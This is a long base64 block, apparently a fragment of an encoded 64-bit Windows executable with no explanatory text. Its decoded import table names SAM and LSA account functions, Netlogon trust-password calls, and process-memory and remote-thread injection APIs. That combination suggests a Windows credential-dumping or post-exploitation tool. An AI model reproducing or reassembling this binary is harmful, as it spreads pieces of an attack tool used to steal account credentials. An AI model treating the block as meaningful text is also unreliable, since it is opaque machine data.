cGVuQWxpYXMAABUAU2FtR2V0QWxpYXNNZW1iZXJzaGlwABIAU2FtRW51bWVyYXRlR3JvdXBzSW5Eb21haW4AABsAU2FtTG9va3VwRG9tYWluSW5TYW1TZXJ2ZXIAABoAU2FtR2V0TWVtYmVyc0luR3JvdXAAABkAU2FtR2V0TWVtYmVyc0luQWxpYXMAABgAU2FtR2V0R3JvdXBzRm9yVXNlcgBTQU1MSUIuZGxsAAAYAEZyZWVDb250ZXh0QnVmZmVyADQAUXVlcnlDb250ZXh0QXR0cmlidXRlc1cAJwBMc2FDb25uZWN0VW50cnVzdGVkACgATHNhRGVyZWdpc3RlckxvZ29uUHJvY2VzcwAmAExzYUNhbGxBdXRoZW50aWNhdGlvblBhY2thZ2UAAC0ATHNhTG9va3VwQXV0aGVudGljYXRpb25QYWNrYWdlAAAqAExzYUZyZWVSZXR1cm5CdWZmZXIAU2VjdXIzMi5kbGwABgBDb21tYW5kTGluZVRvQXJndlcAAFNIRUxMMzIuZGxsAMcBSXNDaGFyQWxwaGFOdW1lcmljVwBAAUdldEtleWJvYXJkTGF5b3V0AFVTRVIzMi5kbGwAAAUASGlkRF9HZXRIaWRHdWlkAAEASGlkRF9GcmVlUHJlcGFyc2VkRGF0YQAADABIaWREX0dldFByZXBhcnNlZERhdGEAFQBIaWRQX0dldENhcHMAAAIASGlkRF9HZXRBdHRyaWJ1dGVzAABISUQuRExMAD8BU2V0dXBEaURlc3Ryb3lEZXZpY2VJbmZvTGlzdAAAQwFTZXR1cERpRW51bURldmljZUludGVyZmFjZXMAVgFTZXR1cERpR2V0Q2xhc3NEZXZzVwAAbgFTZXR1cERpR2V0RGV2aWNlSW50ZXJmYWNlRGV0YWlsVwAAU0VUVVBBUEkuZGxsAAAqAFNDYXJkTGlzdFJlYWRlcnNXABYAU0NhcmRHZXRDYXJkVHlwZVByb3ZpZGVyTmFtZVcAJABTQ2FyZExpc3RDYXJkc1cAMwBTQ2FyZFJlbGVhc2VDb250ZXh0AAwAU0NhcmRFc3RhYmxpc2hDb250ZXh0AAoAU0NhcmREaXNjb25uZWN0ABQAU0NhcmRHZXRBdHRyaWIAABMAU0NhcmRGcmVlTWVtb3J5AAgAU0NhcmRDb25uZWN0VwBXaW5TQ2FyZC5kbGwAAFdMREFQMzIuZGxsABUAUnRsRnJlZUFuc2lTdHJpbmcAIABSdGxVbmljb2RlU3RyaW5nVG9BbnNpU3RyaW5nAAAWAFJ0bEZyZWVVbmljb2RlU3RyaW5nAAASAFJ0bERvd25jYXNlVW5pY29kZVN0cmluZwAAFABSdGxFcXVhbFVuaWNvZGVTdHJpbmcAHABSdGxJbml0VW5pY29kZVN0cmluZwAAAgBOdFF1ZXJ5T2JqZWN0ABgAUnRsR2V0Q29tcHJlc3Npb25Xb3JrU3BhY2VTaXplAAAPAFJ0bENvbXByZXNzQnVmZmVyAAUATnRRdWVyeVN5c3RlbUluZm9ybWF0aW9uAAABAE50UXVlcnlJbmZvcm1hdGlvblByb2Nlc3MAGQBSdGxHZXRDdXJyZW50UGViAAAQAFJ0bENyZWF0ZVVzZXJUaHJlYWQAFwBSdGxHVUlERnJvbVN0cmluZwAfAFJ0bFN0cmluZ0Zyb21HVUlEABoAUnRsR2V0TnRWZXJzaW9uTnVtYmVycwAADgBSdGxBcHBlbmRVbmljb2RlU3RyaW5nVG9TdHJpbmcAACIAUnRsVXBjYXNlVW5pY29kZVN0cmluZwAADQBSdGxBbnNpU3RyaW5nVG9Vbmljb2RlU3RyaW5nAAAGAE50UmVzdW1lUHJvY2VzcwAMAFJ0bEFkanVzdFByaXZpbGVnZQAACwBOdFRlcm1pbmF0ZVByb2Nlc3MAAAoATnRTdXNwZW5kUHJvY2VzcwAACABOdFNldFN5c3RlbUVudmlyb25tZW50VmFsdWVFeAAEAE50UXVlcnlTeXN0ZW1FbnZpcm9ubWVudFZhbHVlRXgAAABOdEVudW1lcmF0ZVN5c3RlbUVudmlyb25tZW50VmFsdWVzRXgAABMAUnRsRXF1YWxTdHJpbmcAAG50ZGxsLmRsbAABAElfTmV0U2VydmVyUmVxQ2hhbGxlbmdlAAAASV9OZXRTZXJ2ZXJBdXRoZW50aWNhdGUyAAACAElfTmV0U2VydmVyVHJ1c3RQYXNzd29yZHNHZXQAAG5ldGFwaTMyLmRsbAAAKwFGaWxlVGltZVRvU3lzdGVtVGltZQAAwwNSZWFkRmlsZQAANAVXcml0ZUZpbGUARgNMb2NhbEFsbG9jAACPAENyZWF0ZUZpbGVXAMAEU2xlZXAACAJHZXRMYXN0RXJyb3IAAM8EVGVybWluYXRlVGhyZWFkAFIAQ2xvc2VIYW5kbGUAtABDcmVhdGVUaHJlYWQAAEoDTG9jYWxGcmVlAD8BRmluZEZpcnN0RmlsZVcAAPgBR2V0RmlsZVNpemVFeABLAUZpbmROZXh0RmlsZVcAIwFFeHBhbmRFbnZpcm9ubWVudFN0cmluZ3NXADQBRmluZENsb3NlAPEBR2V0RmlsZUF0dHJpYnV0ZXNXAADFAUdldEN1cnJlbnREaXJlY3RvcnlXAABdAUZsdXNoRmlsZUJ1ZmZlcnMAAMYBR2V0Q3VycmVudFByb2Nlc3MA7ABEdXBsaWNhdGVIYW5kbGUAggNPcGVuUHJvY2VzcwDhAERldmljZUlvQ29udHJvbAA9BVdyaXRlUHJvY2Vzc01lbW9yeQAA/gRWaXJ0dWFsUHJvdGVjdAAA+wRWaXJ0dWFsRnJlZQD4BFZpcnR1YWxBbGxvYwAAdARTZXRGaWxlUG9pbnRlcgAA/wRWaXJ0dWFsUHJvdGVjdEV4AAD5BFZpcnR1YWxBbGxvY0V4AADGA1JlYWRQcm9jZXNzTWVtb3J5APwEVmlydHVhbEZyZWVFeAAABVZpcnR1YWxRdWVyeQAAAQVWaXJ0dWFsUXVlcnlFeAAA5QRVbm1hcFZpZXdPZkZpbGUAjABDcmVhdGVGaWxlTWFwcGluZ1cAAFkDTWFwVmlld09mRmlsZQBNA0xvY2FsUmVBbGxvYwAAqABDcmVhdGVQcm9jZXNzVwAAgARTZXRMYXN0RXJyb3IAAAgFV2FpdEZvclNpbmdsZU9iamVjdACpAENyZWF0ZVJlbW90ZVRocmVhZAAAKgFGaWxlVGltZVRvTG9jYWxGaWxlVGltZQCeAkdldFRpbWVGb3JtYXRXAAAgBVdpZGVDaGFyVG9NdWx0aUJ5dGUAzwFHZXREYXRlRm9ybWF0VwAAFQBBcmVGaWxlQXBpc0FOU0kA3ARUcnlFbnRlckNyaXRpY2FsU2VjdGlvbgDVAkhlYXBDcmVhdGUAANcCSGVhcEZyZWUAAPIARW50ZXJDcml0aWNhbFNlY3Rpb24AAAICR2V0RnVsbFBhdGhOYW1lVwAA1gFHZXREaXNrRnJlZVNwYWNlVwCLA091dHB1dERlYnVnU3RyaW5nQQAAVANMb2NrRmlsZQAAOwNMZWF2ZUNyaXRpY2FsU2VjdGlvbgAA6gJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uAP8BR2V0RnVsbFBhdGhOYW1lQQAAYQRTZXRFbmRPZkZpbGUAAOQEVW5sb2NrRmlsZUV4AACMAkdldFRlbXBQYXRoVwAAngBDcmVhdGVNdXRleFcAAKwCR2V0VmVyc2lvbkV4VwDfAkhlYXBWYWxpZGF0ZQAA3AJIZWFwU2l6ZQAAaQNNdWx0aUJ5dGVUb1dpZGVDaGFyAIsCR2V0VGVtcFBhdGhBAABkAUZvcm1hdE1lc3NhZ2VXAADTAUdldERpc2tGcmVlU3BhY2VBAOwBR2V0RmlsZUF0dHJpYnV0ZXNBAADuAUdldEZpbGVBdHRyaWJ1dGVzRXhXAACMA091dHB1dERlYnVnU3RyaW5nVwAAYAFGbHVzaFZpZXdPZkZpbGUAiABDcmVhdGVGaWxlQQAJBVdhaXRGb3JTaW5nbGVPYmplY3RFeACrAkdldFZlcnNpb25FeEEA1ABEZWxldGVGaWxlQQDXAERlbGV0ZUZpbGVXANoCSGVhcFJlQWxsb2MAegJHZXRTeXN0ZW1JbmZvANMCSGVhcEFsbG9jANQCSGVhcENvbXBhY3QA1gJIZWFwRGVzdHJveQDjBFVubG9ja0ZpbGUAAIkAQ3JlYXRlRmlsZU1hcHBpbmdBAABVA0xvY2tGaWxlRXgAAPcBR2V0RmlsZVNpemUA0gBEZWxldGVDcml0aWNhbFNlY3Rpb24AxwFHZXRDdXJyZW50UHJvY2Vzc0lkAFECR2V0UHJvY2Vzc0hlYXAAAMsEU3lzdGVtVGltZVRvRmlsZVRpbWUAAIACR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAfgJHZXRTeXN0ZW1UaW1lAGMBRm9ybWF0TWVzc2FnZUEAAKkDUXVlcnlQZXJmb3JtYW5jZUNvdW50ZXIAmgJHZXRUaWNrQ291bnQAAEEDTG9hZExpYnJhcnlXAABMAkdldFByb2NBZGRyZXNzAABoAUZyZWVMaWJyYXJ5AB4CR2V0TW9kdWxlSGFuZGxlVwAAuAFHZXRDb25zb2xlU2NyZWVuQnVmZmVySW5mbwAAawJHZXRTdGRIYW5kbGUAAJ8CR2V0VGltZVpvbmVJbmZvcm1hdGlvbgAALgFGaWxsQ29uc29sZU91dHB1dENoYXJhY3RlclcAWwRTZXRDdXJyZW50RGlyZWN0b3J5VwAAPwRTZXRDb25zb2xlQ3Vyc29yUG9zaXRpb24AAMoBR2V0Q3VycmVudFRocmVhZAAAywFHZXRDdXJyZW50VGhyZWFkSWQAAO8CSW5pdGlhbGl6ZVNMaXN0SGVhZAAYBFJ0bENhcHR1cmVDb250ZXh0AB8EUnRsTG9va3VwRnVuY3Rpb25FbnRyeQAAJgRSdGxWaXJ0dWFsVW53aW5kAAACA0lzRGVidWdnZXJQcmVzZW50AOIEVW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAACzBFNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgBqAkdldFN0YXJ0dXBJbmZvVwAGA0lzUHJvY2Vzc29yRmVhdHVyZVByZXNlbnQAS0VSTkVMMzIuZGxsAAAlBFJ0bFVud2luZEV4APECSW50ZXJsb2NrZWRGbHVzaFNMaXN0AOsCSW5pdGlhbGl6ZUNyaXRpY2FsU2VjdGlvbkFuZFNwaW5Db3VudADTBFRsc0FsbG9jAADVBFRsc0dldFZhbHVlANYEVGxzU2V0VmFsdWUA1ARUbHNGcmVlAEADTG9hZExpYnJhcnlFeFcAAIwBR2V0Q29tbWFuZExpbmVBAI0BR2V0Q29tbWFuZExpbmVXAB8BRXhpdFByb2Nlc3MAzgRUZXJtaW5hdGVQcm9jZXNzAAAdAkdldE1vZHVsZUhhbmRsZUV4VwAAGQJHZXRNb2R1bGVGaWxlTmFtZUEAAG4BR2V0QUNQAAD6AUdldEZpbGVUeXBlAGQAQ29tcGFyZVN0cmluZ1cAAC8DTENNYXBTdHJpbmdXAACgAUdldENvbnNvbGVDUAAAsgFHZXRDb25zb2xlTW9kZQAAlARTZXRTdGRIYW5kbGUAAHACR2V0U3RyaW5nVHlwZVcAADkBRmluZEZpcnN0RmlsZUV4QQAASQFGaW5kTmV4dEZpbGVBAAwDSXNWYWxpZENvZGVQYWdlAD4CR2V0T0VNQ1AAAHgBR2V0Q1BJbmZvAOEBR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAZwFGcmVlRW52aXJvbm1lbnRTdHJpbmdzVwBkBFNldEVudmlyb25tZW50VmFyaWFibGVBAHUEU2V0RmlsZVBvaW50ZXJFeAAA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UCUKgAEAAADcfgaAAQAAAAAAAAAAAAAAYCUKgAEAAAA2fwaAAQAAAAAAAAAAAAAAcCUKgAEAAAA8fwaAAQAAAAAAAAAAAAAAgCUKgAEAAAAAAAAAAAAAAAAAAAAAAAAAmCUKgAEAAAAAAAAAAAAAAAAAAAAAAAAAsCUKgAEAAABwfgaAAQAAAAAAAAAAAAAAyCUKgAEAAACWfwaAAQAAAAAAAAAAAAAA2CUKgAEAAAAAfwaAAQAAAAAAAAAAAAAA6CUKgAEAAAAAAAAAAAAAAAAAAAAAAAAA+CUKgAEAAAB4fwaAAQAAAAAAAAAAAAAAECYKgAEAAAAGfwaAAQAAAAAAAAAAAAAAKCYKgAEAAACyfgaAAQAAAAAAAAAAAAAAQCYKgAEAAAAMfwaAAQAAAAAAAAAAAAAAWCYKgAEAAABqfgaAAQAAAAAAAAAAAAAAcCYKgAEAAAASfwaAAQAAAAAAAAAAAAAAiCYKgAEAAAByfwaAAQAAAAAAAAAAAAAAmCYKgAEAAADEfgaAAQAAAAAAAAAAAAAAsCYKgAEAAACsfgaAAQAAAAAAAAAAAAAAyCYKgAEAAABYfgaAAQAAAAAAAAAAAAAA2CYKgAEAAAAAAAAAAAAAAAAAAAAAAAAA6CYKgAEAAABIfwaAAQAAAAAAAAAAAAAA+CYKgAEAAACQfwaAAQAAAAAAAAAAAAAACCcKgAEAAACKfwaAAQAAAAAAAAAAAAAAICcKgAEAAAD6fgaAAQAAAAAAAAAAAAAAMCcKgAEAAADWfgaAAQAAAAAAAAAAAAAAQCcKgAEAAACifwaAAQAAAAAAAAAAAAAAUCcKgAEAAAAwfwaAAQAAAAAAAAAAAAAAYCcKgAEAAADifgaAAQAAAAAAAAAAAAAAcCcKgAEAAABOfwaAAQAAAAAAAAAAAAAAgCcKgAEAAACgfgaAAQAAAAAAAAAAAAAAkCcKgAEAAABafwaAAQAAAAAAAAAAAAAAoCcKgAEAAACmfgaAAQAAAAAAAAAAAAAAsCcKgAEAAABCfwaAAQAAAAAAAAAAAAAAwCcKgAEAAADufgaAAQAAAAAAAAAAAAAA0CcKgAEAAADofgaAAQAAAAAAAAAAAAAA4CcKgAEAAABUfwaAAQAAAAAAAAAAAAAA8CcKgAEAAAAAAAAAAAAAAAAAAAAAAAAAACgKgAEAAAAAAAAAAAAAAAAAAAAAAAAAECgKgAEAAABkfgaAAQAAAAAAAAAAAAAAICgKgAEAAAC+fgaAAQAAAAAAAAAAAAAAMCgKgAEAAABsfwaAAQAAAAAAAAAAAAAAQCgKgAEAAACIfgaAAQAAAAAAAAAAAAAAUCgKgAEAAAD0fgaAAQAAAAAAAAAAAAAAaCgKgAEAAACcfwaAAQAAAAAAAAAAAAAAgCgKgAEAAABAfgaAAQAAAAAAAAAAAAAAkCgKgAEAAADKfgaAAQAAAAAAAAAAAAAAoCgKgAEAAAB2fgaAAQAAAAAAAAAAAAAAsCgKgAEAAABSfgaAAQAAAAAAAAAAAAAAuCgKgAEAAACEfwaAAQAAAAAAAAAAAAAA0CgKgAEAAABgfwaAAQAAAAAAAAAAAAAA4CgKgAEAAADQfgaAAQAAAAAAAAAAAAAA8CgKgAEAAAB8fgaAAQAAAAAAAAAAAAAAACkKgAEAAACUfgaAAQAAAAAAAAAAAAAAGCkKgAEAAABGfgaAAQAAAAAAAAAAAAAAKCkKgAEAAAAAAAAAAAAAAAAAAAAAAAAAOCkKgAEAAACOfgaAAQAAAAAAAAAAAAAAUCkKgAEAAAAqfwaAAQAAAAAAAAAAAAAAaCkKgAEAAAAAAAAAAAAAAAAAAAAAAAAAgCkKgAEAAAAAAAAAAAAAAAAAAAAAAAAAoCkKgAEAAAAAAAAAAAAAAAAAAAAAAAAAuCkKgAEAAAAAAAAAAAAAAAAAAAAAAAAAyCkKgAEAAAAAAAAAAAAAAAAAAAAAAAAA4CkKgAEAAAAAAAAAAAAAAAAAAAAAAAAA8CkKgAEAAAAAAAAAAAAAAAAAAAAAAAAACCoKgAEAAAC4fgaAAQAAAAAAAAAAAAAAICoKgAEAAAAYfwaAAQAAAAAAAAAAAAAAOCoKgAEAAAB+fwaAAQAAAAAAAAAAAAAASCoKgAEAAAAAAAAAAAAAAAAAAAAAAAAAaCoKgAEAAAAAAAAAAAAAAAAAAAAAAAAAiCoKgAEAAAAAAAAAAAAAAAAAAAAAAAAAmCoKgAEAAAAAAAAAAAAAAAAAAAAAAAAAsCoKgAEAAAAefwaAAQAAAAAAAAAAAAAAAQAAAAEAAAABAAAAAAAAAAEAAAD+//9/AAAAAIAAAAD0AQAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/fwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAAAAAAAAAAAAA+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABkAAADr68PrAAABIAAAAACIIwqAAQAAAAAAAAAAAAAA0NoAgAEAAAAAAAAAAAAAAJgjCoABAAAAAAAAAAAAAAAAAAEgAAAAAKgjCoABAAAAAAAAAAAAAADQ2gCAAQAAAAAAAAAAAAAAuCMKgAEAAAAAAAAAAAAAAAAAASAAAAAAyCMKgAEAAAAAAAAAAAAAANDaAIABAAAAAAAAAAAAAADgIwqAAQAAAAAAAAAAAAAAAQIAAAcAAAAAAgAABwAAAAgCAAAHAAAABgIAAAcAAAAHAgAABwAAAAMAAABgAAAA/v8AAAAAAAAAAAAAAAAAACgtCoABAAAAAAAAAAAAAADcIwGAAQAAACgnAYABAAAASCgBgAEAAACYKQGAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAhCwBgAEAAABILQGAAQAAANQtAYABAAAADC4BgAEAAAB8LQGAAQAAAFQKAYABAAAAFAsBgAEAAABoCwGAAQAAAAwBQAAAdevrAQABDAAAAAAAAAAAAAAAAAAAAAAAAAAAVE8DgAEAAAAAAAAAAAAAAHg8CoABAAAAAAAAAAAAAAACAAEMAAAAAAAAAAAAAAAAAAAAAAAAAABUTwOAAQAAAAAAAAAAAAAAiDwKgAEAAAAAAAAAAAAAAAEAAQwAAAAAAAAAAAAAAAAAAAAAAAAAAFRPA4ABAAAAAAAAAAAAAACUPAqAAQAAAAAAAAAAAAAAAQABCAAAAAABAAAAAAAAAAAAAAAAAAAA3FcDgAEAAAAAAAAAAAAAAJw8CoABAAAAAAAAAAAAAAACAAEIAAAAAAEAAAAAAAAAAAAAAAAAAADcVwOAAQAAAAAAAAAAAAAAnDwKgAEAAAAAAAAAAAAAAAEAAQgAAAAAAgAAAAAAAAAAAAAAAAAAANxXA4ABAAAAAAAAAAAAAACkPAqAAQAAAAAAAAAAAAAAAgABCAAAAAACAAAAAAAAAAAAAAAAAAAA3FcDgAEAAAAAAAAAAAAAAKQ8CoABAAAAAAAAAAAAAAABAAEIAAAAAAMAAAAAAAAAAAAAAAAAAADcVwOAAQAAAAAAAAAAAAAArDwKgAEAAAAAAAAAAAAAAAIAAQgAAAAAAwAAAAAAAAAAAAAAAAAAANxXA4ABAAAAAAAAAAAAAACsPAqAAQAAAAAAAAAAAAAA/wAhCAAAAAAAAAAAAAAAAAAAAAAAAAAAID8DgAEAAAAAAAAAAAAAALQ8CoABAAAAAAAAAAAAAAAAACEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtDwKgAEAAAAAAAAAAAAAAAEAIRAAAAAAAAAAAAAAAAAAAAAAAAAAAABdA4ABAAAA6F0DgAEAAAC0PAqAAQAAAAAAAAAAAAAA/wAhCAAAAAABAAAAAAAAAAAAAAAAAAAAID8DgAEAAAAAAAAAAAAAALg8CoABAAAAAAAAAAAAAAAAACEIAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuDwKgAEAAAAAAAAAAAAAAAEAIRAAAAAAAQAAAAAAAAAAAAAAAAAAAABdA4ABAAAA6F0DgAEAAAC4PAqAAQAAAAAAAAAAAAAAAQCBCAAAAAAAAAAAAAAAAAAAAAAAAAAAAEADgAEAAAAAAAAAAAAAALw8CoABAAAAAAAAAAAAAAABAEEIAAAAAAAAAAAAAAAAAAAAAAAAAACMQAOAAQAAAAAAAAAAAAAAxDwKgAEAAAAAAAAAAAAAAAIAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAExCA4ABAAAAAAA